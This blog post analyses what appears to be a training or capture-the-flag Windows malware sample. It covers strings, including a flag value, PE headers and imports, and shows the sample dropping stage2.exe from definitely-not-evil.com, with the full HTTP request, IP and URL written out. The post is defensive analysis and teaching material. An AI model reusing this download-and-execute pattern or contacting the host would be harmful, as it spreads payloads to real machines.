Malware Sample Analysis (29F228F3375C489A8A6E31203AB25787)

File hash:
MD5: 29F228F3375C489A8A6E31203AB25787
Sha1: 14D713A5C8A2FC01FA2F01D993A249B9FB292810
Sha256: EC905CB2CB8E9F74790ADDE2C138807F3A6CDBECD5735FA5035B547280D7DB79

Note: cmd are mentioned in blue.Imp data marked as "purple".


Basic Static Analysis:

Determine the file type:

Using file command:
 

test$ file Unknown
Unknown: PE32 executable (console) Intel 80386, for MS Windows

Using File Signature:

Test$ hexdump Unknown 


0000000 5a4d 0090 0003 0000 0004 0000 ffff 0000
0000010 00b8 0000 0000 0000 0040 0000 0000 0000
0000020 0000 0000 0000 0000 0000 0000 0000 0000
0000030 0000 0000 0000 0000 0000 0000 00d8 0000
0000040 1f0e 0eba b400 cd09 b821 4c01 21cd 6854
0000050 7369 7020 6f72 7267 6d61 6320 6e61 6f6e
0000060 2074 6562 7220 6e75 6920 206e 4f44 2053
0000070 6f6d 6564 0d2e 0a0d 0024 0000 0000 0000
0000080 4be3 9a53 2aa7 c93d 2aa7 c93d 2aa7 c93d
0000090 b7bc c9a3 2aa6 c93d b7bc c997 2aa1 c93d
00000a0 52ae c9ae 2aa2 c93d 2aa7 c93c 2ab5 c93d
00000b0 b7bc c992 2aa6 c93d b7bc c9a0 2aa6 c93d
00000c0 6952 6863 2aa7 c93d 0000 0000 0000 0000
00000d0 0000 0000 0000 0000 4550 0000 014c 0005
00000e0 7f3b 5b57 0000 0000 0000 0000 00e0 0103
00000f0 010b 000a 0600 0000 0400 0007 0000 0000
0000100 1150 0000 1000 0000 2000 0000 0000 0040
0000110 1000 0000 0200 0000 0005 0001 0000 0000
0000120 0005 0001 0000 0000 5000 0008 0400 0000
0000130 0000 0000 0003 8500 0000 0010 1000 0000

1st 2bit of the hexa value is "5a4d".

Which determine as Excutable.

String Analysis:
test$ strings Unknown
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.CRT
@.rsrc
hX @
h` @
hd @
PQSW
hflagh{i_shtay_hout_htoo_hlateh_goth_nothhingh_in_hmy_bhrainj}
hp @
5h1@
=d1@
%X1@
-T1@
hP @
AppData
stage2.exe
Im totally malware
totally not malware
CreateFileA
FindResourceA
LoadResource
WriteFile
Sleep
SizeofResource
CreateProcessA
lstrcatA
GetEnvironmentVariableA
LockResource
CloseHandle
KERNEL32.dll
MessageBoxA
USER32.dll
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
IsProcessorFeaturePresent
Dimmaletyoufinishbut
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.CRT
@.reloc
Qjph
5x @
=` @
SVSSh^
hL!@
5p @
=\ @
T$xRP
D$,j
|$`j
L$PQ
T$xRP
_^[3
definitely-not-evil.com
l00k_wh4t_y0u_m4d3_m3_d0
Content-Type: text/html
User-Agent:Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
oh_tay
ExitProcess
KERNEL32.dll
LoadIconA
LoadCursorA
RegisterClassExA
CreateWindowExA
GetMessageA
TranslateMessage
DispatchMessageA
DestroyWindow
PostQuitMessage
BeginPaint
EndPaint
DefWindowProcA
USER32.dll
GetStockObject
CreateDIBSection
SetDIBits
CreateCompatibleDC
SelectObject
BitBlt
DeleteDC
DeleteObject
GDI32.dll
InternetOpenA
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
InternetReadFile
InternetCloseHandle
WININET.dll
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
IsProcessorFeaturePresent
&&)?>+NQ9^b;dh/]b-\c-[`-[_/Z^)IP
EA?
3($8,)G<7JG<FF:GIAKOFGMG5BD/<?*79 -/
  &)+(259DJ3DI
!#%%*,+-//344033',-
?A"FJ%KO&LQ)NS-PT2TY2RV4QW.NS'IM$FJ
&* %'
#0/,DB7Y[BgjDlp=jn<ko6hl>qtArv)RW
.(+$
($ (*$&*&*/-.650;:2>@+8:"/1
&("03"07
16#7=
!!##,.//11022023+01"((
77 <="AB$EG(LP+QU*RV)SW*SV*PT0TX(MQ!HM!FI!AE
 !,;95MK?__HknMuwKvyFuyM
8oq QU
zv,&!
1,+|vu0*+
HAA)"#
E?@TOP
QNO69;'/?
(- -2.:<'34
" "".00022122/11*./#)*
/2 6: 9< =?&EG.MN-OP+OS(MR%MQ&RU#NQ%MP%KO
!&'/>>:USBbbHkkU{|^
0fh%VY
JHFc_[
    3,/+&&    
.)+
URQ7;E
"%"%%-/.022344022',-#()
;@!>C"AE$DH)IM)GH*JL)MQ(NS(PT(OS$HL%HL
!%&.45/?>:TQIhgX{zj
5ch(TY
PIL!
                    
                
 "%((,...10355022)./"()
9<"?D!CG#GK(KO(KO(JO*JK+LN)MQ%LP#IN#CG#AE
 !))0978B<LXPXoln
Oty<bh-RY!EN
    ;56;67
61)IC<
#'&,10,10.32/43*0/$*)
?C$EJ$HN'KQ&KQ(MS%KQ%NP(LN*JM%GJ
"%%++3:8MTNhqil
Pwy=cf,PV CK
IGBYVO
/*#YSO
26!AM
  %$+0/,20-21-31,21$**
!$"'* /2
9< CG#IM(KP(JP(KQ'JP*MR)MR$MO$FI$@D
"%+00=CA\b\t|tx
XzxAab0PR#CF
yK81
A:;-'(    
@:;RKL& !
 %$,10/43165054-32%+*
"# $'(-1$47"=@$HL(OS)NR+MR-NS,NR'HM"DH!EG!=A 7<
!"!%'054DIG[a\szr
j~zPb`;ML&78
C?@#
XTUNIJ
GBD#
'$&2-/
^^^'&'OKL
!%$-32276387498-32%+*
#$ $'(-1&69&BE'MP'NR'LQ)HM+JN,KP$CH
"#*,/266BFEV[Vx}u
_eb4;:
TNCD80
#",21165487276+10%+*
$&&+/%7;*GJ)OR%MQ'MQ+KO(GJ%EH
"!$(,278@GBPXMx
bd`.11
B@Bwuv,
=<=``a
B@B&$%
.-/A?C
J^    CW
###232466154065,12#')
&%#-.!9@'HN$KP#JP&IO&HM!BG
"%+10<A:U[N
mk`JG@
 ZFA=+$"
edfsrv
:D Na$Ti
 ###...466176498,11#'(
&%#-."6=&EK$HM#FK#BG!=B
#$"&%/1*ZZN
$#$878
!IFH
-((XTU
C?@945
N_$Xl
 !##$+++4664986;:.12#'(
%&%--#37'@C$DF#BD!9=
"& %)
-.&f`R
}8*)
,##' !
.32778
GBD0+-
)##gbc
/)*!
)(*$"&
Tf*`t'g{
DR    %,
 !$$$2224667<;7<;123&()
"#%*+,67*=="=< 98
 !!%&!%&#&*(+/
-+"pgX
J>?938# $
.&'RGH
')#MV1jz:r
$$$8885879>=8=<435()+
!"!'( ((
!!#('*/.055+0/*/.
=00GCD<:;
ICB730!
11+-((
FABd_`
B<7:5.
/*)FA@
wtv/*)
&&(RW7w
"#$%.116:::?>9>>477),-
   )++(,+287:@?054,0/$('
A76DAAIIH+*,
7203/+)%!
% !$
WSRtqp
5//$
[XY;88    
**.V[;x
#!#$&''/115:95;:5;:367'+,
'''555-..5987<;/22,-.(**!##
WPO@@@LLL/12
-'$,$
        {stJCC
LGH% "    
*+0T[@w
-k|/n
##$&&.103874984:9367$()
0..776../244144-..&&&((((((
spkb`^DDE=??"%%
+&%TMJpdbxkgH>;
-++pon
**+JR3er0eo(cq/m
"$#,..2764985;:255 $%
 '&(
533644,++122133-..$##$$$(('
zvjgcYXVIJJ.10
H96I:6-# .&"$


PE Header Analysis:

Open PE bear -> loadPE




DOS HEADER:

"Magic Number : 5A4D " MS-DOS-compatible executable files set this value to 0x5A4D, which represents the ASCII characters MZ. MS-DOS headers are sometimes referred to as MZ headers.

File address of new exe header-is a 4-byte offset into the file where the PE file header is located. It is necessary to use this offset to locate the PE header in the file.

File Header:


Check :
Machine: used to indicate what type of machine the executable was built for.

Section Count: PE file header structure is the NumberOfSections field. It turns out that you need to know how many sections--more specifically, how many section headers and section bodies--are in the file in order to extract the information easily. Each section header and section body is laid out sequentially in the file, so the number of sections is necessary to determine where the section headers and bodies end.
Here 5 section in this PE.


Time Date Stamp

Optional Header:

  • MajorLinkerVersionMinorLinkerVersion. Indicates version of the linker that linked this image.
  • SizeOfCode. Size of executable code.
  • SizeOfInitializedData. Size of initialized data.
  • SizeOfUninitializedData. Size of uninitialized data.
  • AddressOfEntryPoint. Of the standard fields, the AddressOfEntryPoint field is the most interesting for the PE file format. This field indicates the location of the entry point for the application and, perhaps more importantly to system hackers, the location of the end of the Import Address Table (IAT). The following function demonstrates how to retrieve the entry point of a Windows NT executable image from the optional header.

 



 

 

  • FileAlignment. Minimum granularity of chunks of information within the image file prior to loading. For example, the linker zero-pads a section body (raw data for a section) up to the nearestFileAlignment boundary in the file. This value is constrained to be a power of 2 between 512 and 65,535.
  • MajorOperatingSystemVersion. Indicates the major version of the Windows NT operating system.
  • MinorOperatingSystemVersion. Indicates the minor version of the Windows NT operating system.
  • MajorImageVersion. Used to indicate the major version number of the application.
  • MinorImageVersion. Used to indicate the minor version number of the application.
  • MajorSubsystemVersion. Indicates the Windows NT Win32 subsystem major version number.
  • MinorSubsystemVersion. Indicates the Windows NT Win32 subsystem minor version number.
  • Reserved1. Unknown purpose, currently not used by the system and set to zero by the linker.
  • SizeOfImage. Indicates the amount of address space to reserve in the address space for the loaded executable image. This number is influenced greatly by SectionAlignment. For example, consider a system having a fixed page size of 4096 bytes. If you have an executable with 11 sections, each less than 4096 bytes, aligned on a 65,536-byte boundary, the SizeOfImage field would be set to 11 * 65,536 = 720,896 (176 pages). The same file linked with 4096-byte alignment would result in 11 * 4096 = 45,056 (11 pages) for the SizeOfImage field. This is a simple example in which each section requires less than a page of memory. In reality, the linker determines the exact SizeOfImage by figuring each section individually. It first determines how many bytes the section requires, then it rounds up to the nearest page boundary, and finally it rounds page count to the nearest SectionAlignment boundary. The total is then the sum of each section's individual requirement.
  • SizeOfHeaders. This field indicates how much space in the file is used for representing all the file headers, including the MS-DOS header, PE file header, PE optional header, and PE section headers. The section bodies begin at this location in the file.
  • CheckSum. A checksum value is used to validate the executable file at load time. The value is set and verified by the linker. The algorithm used for creating these checksum values is proprietary information and will not be published.
  • Subsystem. Field used to identify the target subsystem for this executable. Each of the possible subsystem values are listed in the WINNT.H file immediately after theIMAGE_OPTIONAL_HEADER structure.
  • DllCharacteristics. Flags used to indicate if a DLL image includes entry points for process and thread initialization and termination.
  • SizeOfStackReserveSizeOfStackCommitSizeOfHeapReserveSizeOfHeapCommit. These fields control the amount of address space to reserve and commit for the stack and default heap. Both the stack and heap have default values of 1 page committed and 16 pages reserved. These values are set with the linker switches -STACKSIZE: and -HEAPSIZE:.
  • LoaderFlags. Tells the loader whether to break on load, debug on load, or the default, which is to let things run normally.
  • NumberOfRvaAndSizes. This field identifies the length of the DataDirectory array that follows. It is important to note that this field is used to identify the size of the array, not the number of valid entries in the array.
  • DataDirectory. The data directory indicates where to find other important components of executable information in the file. It is really nothing more than an array of IMAGE_DATA_DIRECTORY structures that are located at the end of the optional header structure. The current PE file format defines 16 possible data directories, 11 of which are now being used.

 

 

Section Header: 

Sections contain the content of the file, including code, data, resources, and other executable information. 

 

The .rdata section represents read-only data, such as literal strings, constants, and debug directory information.
All other variables (except automatic variables, which appear on the stack) are stored in the .data section. Basically, these are application or module global variables.
The .edata section contains export data for an application or DLL. When present, this section contains an export directory for getting to the export information.
 

 

 Imports:

The .idata section is import data, including the import directory and import address name table.  


 

 Here 2 DLL are Imported.They are,
                KERNEL32.dll

                         CreateFileA-Creates or opens a file or I/O device.

                         FindResourceA -Determines the location of a resource with the specified type and name in the specified module.

LoadResource-

Retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.

 WriteFile-Writes data to the specified file or input/output (I/O) device.

Sleep

SizeofResource -Retrieves the size, in bytes, of the specified resource.

CreateProcessA-Creates a new process and its primary thread. The new process runs in the security context of the calling process.

lstrcatA-Appends one string to another.

GetEnvironmentVariableA-Retrieves the contents of the specified variable from the environment block of the calling process.

LockResource-Retrieves a pointer to the specified resource in memory.

CloseHandle-Closes an open object handle.

IsDebuggerPresent-Determines whether the calling process is being debugged by a user-mode debugger.

 SetUnhandledExceptionFilter-Enables an application to supersede the top-level exception handler of each thread of a process.

TerminateProcess

GetCurrentProcess

UnhandledExceptionFilter

IsProcessorFeaturePresent

                USER32.dll

                         MessageBoxA-Displays a modal dialog box that contains a system icon, a set of buttons, and a brief application-specific message, such as status or error information. The message box returns an integer value that indicates which button the user clicked.

KERNEL32.dll uses the 17 function and USER32.dll uses 1 function.



Other Vendors :

 

 Most of the AV marked as "Malicious".

 

Dynamic Analysis:

 

After Running a malware in secure environment.


Process Monitoring:

 

 

C:\Users\admin\AppData\Roaming\stage2.exe created a process.

 

stage2.exe which is dropped on the system using "/l00k_wh4t_y0u_m4d3_m3_d0" url.

Http Header:

URL /l00k_wh4t_y0u_m4d3_m3_d0
Method GET
Content-Type text/html
User-Agent Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Host definitely-not-evil.com
Cache-Control no-cache
 
 
Network Monitoring:

47 45 54 20 2F 6C 30 30 6B 5F 77 68 34 74 5F 79 30 75 5F 6D 34 64 33 5F 6D 33 5F 64 30 20 48 54 54 50 2F 31 2E 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 69 6E 36 34 3B 20 78 36 34 3B 20 72 76 3A 34 37 2E 30 29 20 47 65 63 6B 6F 2F 32 30 31 30 30 31 30 31 20 46 69 72 65 66 6F 78 2F 34 37 2E 30 0D 0A 48 6F 73 74 3A 20 64 65 66 69 6E 69 74 65 6C 79 2D 6E 6F 74 2D 65 76 69 6C 2E 63 6F 6D 0D 0A 43 61 63 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 0D 0A

GET /l00k_wh4t_y

0u_m4d3_m3_d0 HT

TP/1.1..Content-

Type: text/html.

.User-Agent: Moz

illa/5.0 (Window

s NT 6.1; Win64;

x64; rv:47.0) G

ecko/20100101 Fi

refox/47.0..Host

: definitely-not

-evil.com..Cache

-Control: no-cac

he....

 
Connection ip:45.55.137.243 
url:http://definitely-not-evil.com/l00k_wh4t_y0u_m4d3_m3_d0

Registry Monitoring:


Keys deleted: 19483


Comments

Post a Comment

Popular posts from this blog

System Malware Analysis

What is Malware ?                           Malware is a code that performs malicious actions; it can take the form of an executable,script, code, or any other software. Attackers use malware to steal sensitive information, spy on the infected system, or take control of the system. It typically gets into your system without your consent and can be delivered via various communication channels such as email, web, or USB drives. The following are some of the malicious actions performed by malware: Disrupting computer operations Stealing sensitive information, including personal, business, and financial data Unauthorized access to the victim's system Spying on the victims Sending spam emails Engaging in distributed-denial-of-service attacks (DDOS) Locking up the files on the computer and holding them for ransom Types of Malware  Botnets Ransomware Rootkits Trojans Viruses Worms Adware sp...
Read more

Static Analysis

Image
Static Analysis                                          Examine the executable file without viewing the actual instruction. Try to figure out what the malware is trying to do and the commands it is attempting to execute. Identifying the File type Extracting the String Analysis binary with Virus Total   Determining Obfuscation of binary   Examine the PE header Malware Sources:                          Once you have a lab set up, you will need malware samples for performing analysis.The following are some of the sources from where you can get malware samples for your analysis.             ...
Read more